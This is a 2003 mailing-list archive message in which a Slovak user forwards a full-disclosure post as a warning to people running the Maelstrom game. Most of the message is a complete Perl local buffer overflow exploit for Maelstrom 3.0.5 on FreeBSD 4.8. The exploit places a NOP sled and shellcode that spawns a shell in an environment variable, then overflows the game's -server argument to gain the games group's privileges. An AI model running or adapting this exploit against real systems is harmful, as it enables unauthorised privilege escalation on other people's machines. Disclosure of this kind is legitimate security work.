FW: Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition
Michal Kapalka
michal.kapalka at mfn.sk
Wed May 21 07:44:04 CEST 2003
Ahoj dnes som us seba v mali nasiel toto :-(
Tak len pisem ze ak niekdo pouziva nech sa zariadi :)
Michal Kapalka
-----Original Message-----
From: Knud Erik Hřjgaard [mailto:kain at ircop.dk]
Sent: Tuesday, May 20, 2003 7:52 PM
To: bugtraq at securityfocus.com; full-disclosure at lists.netsys.com
Subject: Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition
hey, it's maelort.pl.
#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug
found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD
4.8-RELEASE.
# maelstrom-3.0.5 Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists ==
flooded mbox #¤%
$len = 1000;
$ret = pack("l",0xbfbffb7f);
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
for ($i = 0; $i < $len - length($shellcode); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;
exec("/usr/X11R6/bin/Maelstrom -server $cakeman");
--
kokanin
More information about the Users-l
mailing list